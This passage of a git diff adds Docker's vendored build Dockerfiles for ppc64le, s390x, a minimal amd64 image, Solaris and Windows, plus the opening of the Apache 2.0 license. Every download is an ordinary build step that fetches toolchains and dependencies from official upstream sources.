+# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
+
+# Compile and install lvm2
+RUN cd /usr/local/lvm2 \
+	&& ./configure \
+		--build="$(gcc -print-multiarch)" \
+		--enable-static_link \
+	&& make device-mapper \
+	&& make install_device-mapper
+# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+# Install seccomp: the version shipped in jessie is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+        && export SECCOMP_PATH="$(mktemp -d)" \
+        && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+                | tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+        && ( \
+                cd "$SECCOMP_PATH" \
+                && ./configure --prefix=/usr/local \
+                && make \
+                && make install \
+                && ldconfig \
+        ) \
+        && rm -rf "$SECCOMP_PATH"
+
+
+# Install Go
+# NOTE: official ppc64le go binaries weren't available until go 1.6.4 and 1.7.4
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \
+	| tar -xzC /usr/local
+
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+
+# Dependency for golint
+ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
+RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
+	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
+
+# Grab Go's lint tool
+ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
+RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
+	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
+	&& go install -v github.com/golang/lint/golint
+
+# Install two versions of the registry. The first is an older version that
+# only supports schema1 manifests. The second is a newer version that supports
+# both. This allows integration-cli tests to cover push/pull with both schema1
+# and schema2 manifests.
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
+ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
+	&& rm -rf "$GOPATH"
+
+# Install notary and notary-server
+ENV NOTARY_VERSION v0.4.2
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
+	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
+	&& rm -rf "$GOPATH"
+
+# Get the "docker-py" source so we can run their integration tests
+ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
+RUN git clone https://github.com/docker/docker-py.git /docker-py \
+	&& cd /docker-py \
+	&& git checkout -q $DOCKER_PY_COMMIT \
+	&& pip install -r test-requirements.txt
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME /var/lib/docker
+WORKDIR /go/src/github.com/docker/docker
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+
+# Let us use a .bashrc file
+RUN ln -sfv $PWD/.bashrc ~/.bashrc
+
+# Register Docker's bash completion.
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
+
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
+RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
+	ppc64le/buildpack-deps:jessie@sha256:902bfe4ef1389f94d143d64516dd50a2de75bca2e66d4a44b1d73f63ddf05dda \
+	ppc64le/busybox:latest@sha256:38bb82085248d5a3c24bd7a5dc146f2f2c191e189da0441f1c2ca560e3fc6f1b \
+	ppc64le/debian:jessie@sha256:412845f51b6ab662afba71bc7a716e20fdb9b84f185d180d4c7504f8a75c4f91 \
+	ppc64le/hello-world:latest@sha256:186a40a9a02ca26df0b6c8acdfb8ac2f3ae6678996a838f977e57fac9d963974
+# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
+
+# Install tomlv, vndr, runc, containerd, tini, docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
+
+# Wrap all commands in the "docker-in-docker" script to allow nested containers
+ENTRYPOINT ["hack/dind"]
+
+# Upload docker source
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.s390x b/vendor/github.com/docker/docker/Dockerfile.s390x
new file mode 100644
index 0000000000..ba94bc70aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.s390x
@@ -0,0 +1,190 @@
+# This file describes the standard way to build Docker on s390x, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker -f Dockerfile.s390x .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM s390x/gcc:6.1
+
+# Packaged dependencies
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	aufs-tools \
+	automake \
+	bash-completion \
+	btrfs-tools \
+	build-essential \
+	cmake \
+	createrepo \
+	curl \
+	dpkg-sig \
+	git \
+	iptables \
+	jq \
+	net-tools \
+	libapparmor-dev \
+	libcap-dev \
+	libltdl-dev \
+	libsqlite3-dev \
+	libsystemd-journal-dev \
+	libtool \
+	mercurial \
+	pkg-config \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-websocket \
+	xfsprogs \
+	tar \
+	vim-common \
+	--no-install-recommends
+
+# glibc in Debian has a bug specific to s390x that won't be fixed until Debian 8.6 is released
+# - https://github.com/docker/docker/issues/24748
+# - https://sourceware.org/git/?p=glibc.git;a=commit;h=890b7a4b33d482b5c768ab47d70758b80227e9bc
+# - https://sourceware.org/git/?p=glibc.git;a=commit;h=2e807f29595eb5b1e5d0decc6e356a3562ecc58e
+RUN echo 'deb http://httpredir.debian.org/debian jessie-proposed-updates main' >> /etc/apt/sources.list.d/pu.list \
+	&& apt-get update \
+	&& apt-get install -y libc6 \
+	&& rm -rf /var/lib/apt/lists/*
+
+# Install seccomp: the version shipped in jessie is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+	&& export SECCOMP_PATH="$(mktemp -d)" \
+	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+	&& ( \
+		cd "$SECCOMP_PATH" \
+		&& ./configure --prefix=/usr/local \
+		&& make \
+		&& make install \
+		&& ldconfig \
+	) \
+	&& rm -rf "$SECCOMP_PATH"
+
+# Get lvm2 source for compiling statically
+ENV LVM2_VERSION 2.02.103
+RUN mkdir -p /usr/local/lvm2 \
+	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
+		| tar -xzC /usr/local/lvm2 --strip-components=1
+# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+
+# Fix platform enablement in lvm2 to support s390x properly
+RUN set -e \
+	&& for f in config.guess config.sub; do \
+		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
+	done
+# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
+
+# Compile and install lvm2
+RUN cd /usr/local/lvm2 \
+	&& ./configure \
+		--build="$(gcc -print-multiarch)" \
+		--enable-static_link \
+	&& make device-mapper \
+	&& make install_device-mapper
+# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \
+	| tar -xzC /usr/local
+
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+
+# Dependency for golint
+ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
+RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
+	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
+
+# Grab Go's lint tool
+ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
+RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
+	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
+	&& go install -v github.com/golang/lint/golint
+
+# Install two versions of the registry. The first is an older version that
+# only supports schema1 manifests. The second is a newer version that supports
+# both. This allows integration-cli tests to cover push/pull with both schema1
+# and schema2 manifests.
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
+ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
+	&& rm -rf "$GOPATH"
+
+# Install notary and notary-server
+ENV NOTARY_VERSION v0.4.2
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
+	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
+	&& rm -rf "$GOPATH"
+
+# Get the "docker-py" source so we can run their integration tests
+ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
+RUN git clone https://github.com/docker/docker-py.git /docker-py \
+	&& cd /docker-py \
+	&& git checkout -q $DOCKER_PY_COMMIT \
+	&& pip install -r test-requirements.txt
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME /var/lib/docker
+WORKDIR /go/src/github.com/docker/docker
+ENV DOCKER_BUILDTAGS apparmor selinux seccomp
+
+# Let us use a .bashrc file
+RUN ln -sfv $PWD/.bashrc ~/.bashrc
+
+# Register Docker's bash completion.
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
+
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
+RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
+	s390x/buildpack-deps:jessie@sha256:4d1381224acaca6c4bfe3604de3af6972083a8558a99672cb6989c7541780099 \
+	s390x/busybox:latest@sha256:dd61522c983884a66ed72d60301925889028c6d2d5e0220a8fe1d9b4c6a4f01b \
+	s390x/debian:jessie@sha256:b74c863400909eff3c5e196cac9bfd1f6333ce47aae6a38398d87d5875da170a \
+	s390x/hello-world:latest@sha256:780d80b3a7677c3788c0d5cd9168281320c8d4a6d9183892d8ee5cdd610f5699
+# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
+
+# Install tomlv, vndr, runc, containerd, tini, docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
+
+# Wrap all commands in the "docker-in-docker" script to allow nested containers
+ENTRYPOINT ["hack/dind"]
+
+# Upload docker source
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.simple b/vendor/github.com/docker/docker/Dockerfile.simple
new file mode 100644
index 0000000000..8eeb3d96bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.simple
@@ -0,0 +1,73 @@
+# docker build -t docker:simple -f Dockerfile.simple .
+# docker run --rm docker:simple hack/make.sh dynbinary
+# docker run --rm --privileged docker:simple hack/dind hack/make.sh test-unit
+# docker run --rm --privileged -v /var/lib/docker docker:simple hack/dind hack/make.sh dynbinary test-integration-cli
+
+# This represents the bare minimum required to build and test Docker.
+
+FROM debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+# Compile and runtime deps
+# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#build-dependencies
+# https://github.com/docker/docker/blob/master/project/PACKAGERS.md#runtime-dependencies
+RUN apt-get update && apt-get install -y --no-install-recommends \
+		btrfs-tools \
+		build-essential \
+		curl \
+		cmake \
+		gcc \
+		git \
+		libapparmor-dev \
+		libdevmapper-dev \
+		libsqlite3-dev \
+		\
+		ca-certificates \
+		e2fsprogs \
+		iptables \
+		procps \
+		xfsprogs \
+		xz-utils \
+		\
+		aufs-tools \
+		vim-common \
+	&& rm -rf /var/lib/apt/lists/*
+
+# Install seccomp: the version shipped in trusty is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+	&& export SECCOMP_PATH="$(mktemp -d)" \
+	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+	&& ( \
+		cd "$SECCOMP_PATH" \
+		&& ./configure --prefix=/usr/local \
+		&& make \
+		&& make install \
+		&& ldconfig \
+	) \
+	&& rm -rf "$SECCOMP_PATH"
+
+# Install Go
+# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines
+#            will need updating, to avoid errors. Ping #docker-maintainers on IRC
+#            with a heads-up.
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \
+	| tar -xzC /usr/local
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+ENV CGO_LDFLAGS -L/lib
+
+# Install runc, containerd, tini and docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh runc containerd tini proxy
+
+ENV AUTO_GOPATH 1
+WORKDIR /usr/src/docker
+COPY . /usr/src/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.solaris b/vendor/github.com/docker/docker/Dockerfile.solaris
new file mode 100644
index 0000000000..bb342e5e6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.solaris
@@ -0,0 +1,20 @@
+# Defines an image that hosts a native Docker build environment for Solaris
+# TODO: Improve stub
+
+FROM solaris:latest
+
+# compile and runtime deps
+RUN pkg install --accept \
+		git \
+		gnu-coreutils \
+		gnu-make \
+		gnu-tar \
+		diagnostic/top \
+		golang \
+		library/golang/* \
+		developer/gcc-*
+
+ENV GOPATH /go/:/usr/lib/gocode/1.5/
+ENV DOCKER_CROSSPLATFORMS solaris/amd64
+WORKDIR /go/src/github.com/docker/docker
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.windows b/vendor/github.com/docker/docker/Dockerfile.windows
new file mode 100644
index 0000000000..652d07275e
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.windows
@@ -0,0 +1,267 @@
+# escape=`
+
+# -----------------------------------------------------------------------------------------
+# This file describes the standard way to build Docker in a container on Windows
+# Server 2016 or Windows 10.
+#
+# Maintainer: @jhowardmsft
+# -----------------------------------------------------------------------------------------
+
+
+# Prerequisites:
+# --------------
+#
+# 1. Windows Server 2016 or Windows 10 with all Windows updates applied. The major 
+#    build number must be at least 14393. This can be confirmed, for example, by 
+#    running the following from an elevated PowerShell prompt - this sample output 
+#    is from a fully up to date machine as at mid-November 2016:
+#
+#    >> PS C:\> $(gin).WindowsBuildLabEx
+#    >> 14393.447.amd64fre.rs1_release_inmarket.161102-0100
+#
+# 2. Git for Windows (or another git client) must be installed. https://git-scm.com/download/win.
+#
+# 3. The machine must be configured to run containers. For example, by following
+#    the quick start guidance at https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start or
+#    https://github.com/docker/labs/blob/master/windows/windows-containers/Setup.md
+#
+# 4. If building in a Hyper-V VM: For Windows Server 2016 using Windows Server
+#    containers as the default option, it is recommended you have at least 1GB 
+#    of memory assigned; For Windows 10 where Hyper-V Containers are employed, you
+#    should have at least 4GB of memory assigned. Note also, to run Hyper-V 
+#    containers in a VM, it is necessary to configure the VM for nested virtualization.
+
+# -----------------------------------------------------------------------------------------
+
+
+# Usage:
+# -----
+#
+#  The following steps should be run from an (elevated*) Windows PowerShell prompt. 
+#
+#  (*In a default installation of containers on Windows following the quick-start guidance at
+#    https://msdn.microsoft.com/en-us/virtualization/windowscontainers/quick_start/quick_start,
+#    the docker.exe client must run elevated to be able to connect to the daemon).
+#
+# 1. Clone the sources from github.com:
+#
+#    >>   git clone https://github.com/docker/docker.git C:\go\src\github.com\docker\docker
+#    >>   Cloning into 'C:\go\src\github.com\docker\docker'...
+#    >>   remote: Counting objects: 186216, done.
+#    >>   remote: Compressing objects: 100% (21/21), done.
+#    >>   remote: Total 186216 (delta 5), reused 0 (delta 0), pack-reused 186195
+#    >>   Receiving objects: 100% (186216/186216), 104.32 MiB | 8.18 MiB/s, done.
+#    >>   Resolving deltas: 100% (123139/123139), done.
+#    >>   Checking connectivity... done.
+#    >>   Checking out files: 100% (3912/3912), done.
+#    >>   PS C:\>
+#
+#
+# 2. Change directory to the cloned docker sources:
+#
+#    >>   cd C:\go\src\github.com\docker\docker 
+#
+#
+# 3. Build a docker image with the components required to build the docker binaries from source
+#    by running one of the following:
+#
+#    >>   docker build -t nativebuildimage -f Dockerfile.windows .          
+#    >>   docker build -t nativebuildimage -f Dockerfile.windows -m 2GB .    (if using Hyper-V containers)
+#
+#
+# 4. Build the docker executable binaries by running one of the following:
+#
+#    >>   docker run --name binaries nativebuildimage hack\make.ps1 -Binary
+#    >>   docker run --name binaries -m 2GB nativebuildimage hack\make.ps1 -Binary    (if using Hyper-V containers)
+#
+#
+# 5. Copy the binaries out of the container, replacing HostPath with an appropriate destination 
+#    folder on the host system where you want the binaries to be located.
+#
+#    >>   docker cp binaries:C:\go\src\github.com\docker\docker\bundles\docker.exe C:\HostPath\docker.exe
+#    >>   docker cp binaries:C:\go\src\github.com\docker\docker\bundles\dockerd.exe C:\HostPath\dockerd.exe
+#
+#
+# 6. (Optional) Remove the interim container holding the built executable binaries:
+#
+#    >>    docker rm binaries
+#
+#
+# 7. (Optional) Remove the image used for the container in which the executable
+#    binaries are build. Tip - it may be useful to keep this image around if you need to
+#    build multiple times. Then you can take advantage of the builder cache to have an
+#    image which has all the components required to build the binaries already installed.
+#
+#    >>    docker rmi nativebuildimage
+#
+
+# -----------------------------------------------------------------------------------------
+
+
+#  The validation tests can either run in a container, or directly on the host. To run in a
+#  container, ensure you have created the nativebuildimage above. Then run one of the
+#  following from an (elevated) Windows PowerShell prompt:
+#
+#    >>   docker run --rm nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat
+#    >>   docker run --rm -m 2GB nativebuildimage hack\make.ps1 -DCO -PkgImports -GoFormat    (if using Hyper-V containers)
+
+# To run the validation tests on the host, from the root of the repository, run the
+# following from a Windows PowerShell prompt (elevation is not required): (Note Go
+# must be installed to run these tests)
+#
+#    >>   hack\make.ps1 -DCO -PkgImports -GoFormat
+
+# -----------------------------------------------------------------------------------------
+
+
+#  To run unit tests, ensure you have created the nativebuildimage above. Then run one of
+#  the following from an (elevated) Windows PowerShell prompt:
+#
+#    >>   docker run --rm nativebuildimage hack\make.ps1 -TestUnit
+#    >>   docker run --rm -m 2GB nativebuildimage hack\make.ps1 -TestUnit    (if using Hyper-V containers)
+
+
+# -----------------------------------------------------------------------------------------
+
+
+#  To run all tests and binary build, ensure you have created the nativebuildimage above. Then 
+#  run one of the following from an (elevated) Windows PowerShell prompt:
+#
+#    >>   docker run nativebuildimage hack\make.ps1 -All
+#    >>   docker run -m 2GB nativebuildimage hack\make.ps1 -All    (if using Hyper-V containers)
+
+# -----------------------------------------------------------------------------------------
+
+
+# Important notes:
+# ---------------
+#
+# Don't attempt to use a bind-mount to pass a local directory as the bundles target
+# directory. It does not work (golang attempts for follow a mapped folder incorrectly). 
+# Instead, use docker cp as per the example.
+#
+# go.zip is not removed from the image as it is used by the Windows CI servers
+# to ensure the host and image are running consistent versions of go.
+#
+# Nanoserver support is a work in progress. Although the image will build if the 
+# FROM statement is updated, it will not work when running autogen through hack\make.ps1. 
+# It is suspected that the required GCC utilities (eg gcc, windres, windmc) silently
+# quit due to the use of console hooks which are not available.
+#
+# The docker integration tests do not currently run in a container on Windows, predominantly
+# due to Windows not supporting privileged mode, so anything using a volume would fail.
+# They (along with the rest of the docker CI suite) can be run using 
+# https://github.com/jhowardmsft/docker-w2wCIScripts/blob/master/runCI/Invoke-DockerCI.ps1.
+#
+# -----------------------------------------------------------------------------------------
+
+
+# The number of build steps below are explicitly minimised to improve performance.
+FROM microsoft/windowsservercore
+
+# Use PowerShell as the default shell
+SHELL ["powershell", "-command"]
+
+# Environment variable notes:
+#  - GO_VERSION must be consistent with 'Dockerfile' used by Linux.
+#  - FROM_DOCKERFILE is used for detection of building within a container.
+ENV GO_VERSION=1.7.5 `
+    GIT_VERSION=2.11.0 `
+    GOPATH=C:\go `
+    FROM_DOCKERFILE=1
+
+RUN `
+  $ErrorActionPreference = 'Stop'; `
+  $ProgressPreference = 'SilentlyContinue'; `
+  `
+  Function Test-Nano() { `
+    $EditionId = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name 'EditionID').EditionId; `
+    return (($EditionId -eq 'ServerStandardNano') -or ($EditionId -eq 'ServerDataCenterNano') -or ($EditionId -eq 'NanoServer')); `
+  }`
+  `
+  Function Download-File([string] $source, [string] $target) { `
+    if (Test-Nano) { `
+      $handler = New-Object System.Net.Http.HttpClientHandler; `
+      $client = New-Object System.Net.Http.HttpClient($handler); `
+      $client.Timeout = New-Object System.TimeSpan(0, 30, 0); `
+      $cancelTokenSource = [System.Threading.CancellationTokenSource]::new(); `
+      $responseMsg = $client.GetAsync([System.Uri]::new($source), $cancelTokenSource.Token); `
+      $responseMsg.Wait(); `
+      if (!$responseMsg.IsCanceled) { `
+        $response = $responseMsg.Result; `
+        if ($response.IsSuccessStatusCode) { `
+          $downloadedFileStream = [System.IO.FileStream]::new($target, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write); `
+          $copyStreamOp = $response.Content.CopyToAsync($downloadedFileStream); `
+          $copyStreamOp.Wait(); `
+          $downloadedFileStream.Close(); `
+          if ($copyStreamOp.Exception -ne $null) { throw $copyStreamOp.Exception } `
+        } `
+      } else { `
+      Throw ("Failed to download " + $source) `
+      }`
+    } else { `
+      $webClient = New-Object System.Net.WebClient; `
+      $webClient.DownloadFile($source, $target); `
+    } `
+  } `
+  `
+  setx /M PATH $('C:\git\bin;C:\git\usr\bin;'+$Env:PATH+';C:\gcc\bin;C:\go\bin'); `
+  `
+  Write-Host INFO: Downloading git...; `
+  $location='https://github.com/git-for-windows/git/releases/download/v'+$env:GIT_VERSION+'.windows.1/PortableGit-'+$env:GIT_VERSION+'-64-bit.7z.exe'; `
+  Download-File $location C:\gitsetup.7z.exe; `
+  `
+  Write-Host INFO: Downloading go...; `
+  Download-File $('https://golang.org/dl/go'+$Env:GO_VERSION+'.windows-amd64.zip') C:\go.zip; `
+  `
+  Write-Host INFO: Downloading compiler 1 of 3...; `
+  Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/gcc.zip C:\gcc.zip; `
+  `
+  Write-Host INFO: Downloading compiler 2 of 3...; `
+  Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/runtime.zip C:\runtime.zip; `
+  `
+  Write-Host INFO: Downloading compiler 3 of 3...; `
+  Download-File https://raw.githubusercontent.com/jhowardmsft/docker-tdmgcc/master/binutils.zip C:\binutils.zip; `
+  `
+  Write-Host INFO: Installing PS7Zip package...; `
+  Install-Package PS7Zip -Force | Out-Null; `
+  Write-Host INFO: Importing PS7Zip...; `
+  Import-Module PS7Zip -Force; `
+  New-Item C:\git -ItemType Directory | Out-Null ; `
+  cd C:\git; `
+  Write-Host INFO: Extracting git...; `
+  Expand-7Zip C:\gitsetup.7z.exe | Out-Null; `
+  cd C:\; `
+  `
+  Write-Host INFO: Expanding go...; `
+  Expand-Archive C:\go.zip -DestinationPath C:\; `
+  `
+  Write-Host INFO: Expanding compiler 1 of 3...; `
+  Expand-Archive C:\gcc.zip -DestinationPath C:\gcc -Force; `
+  Write-Host INFO: Expanding compiler 2 of 3...; `
+  Expand-Archive C:\runtime.zip -DestinationPath C:\gcc -Force; `
+  Write-Host INFO: Expanding compiler 3 of 3...; `
+  Expand-Archive C:\binutils.zip -DestinationPath C:\gcc -Force; `
+  `
+  Write-Host INFO: Removing downloaded files...; `
+  Remove-Item C:\gcc.zip; `
+  Remove-Item C:\runtime.zip; `
+  Remove-Item C:\binutils.zip; `
+  Remove-Item C:\gitsetup.7z.exe; `
+  `
+  Write-Host INFO: Creating source directory...; `
+  New-Item -ItemType Directory -Path C:\go\src\github.com\docker\docker | Out-Null; `
+  `
+  Write-Host INFO: Configuring git core.autocrlf...; `
+  C:\git\bin\git config --global core.autocrlf true; `
+  `
+  Write-Host INFO: Completed
+
+# Make PowerShell the default entrypoint
+ENTRYPOINT ["powershell.exe"]
+
+# Set the working directory to the location of the sources
+WORKDIR C:\go\src\github.com\docker\docker
+
+# Copy the sources into the container
+COPY . .
diff --git a/vendor/github.com/docker/docker/LICENSE b/vendor/github.com/docker/docker/LICENSE
new file mode 100644
index 0000000000..8f3fee627a
--- /dev/null
+++ b/vendor/github.com/docker/docker/LICENSE
@@ -0,0 +1,191 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        https://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
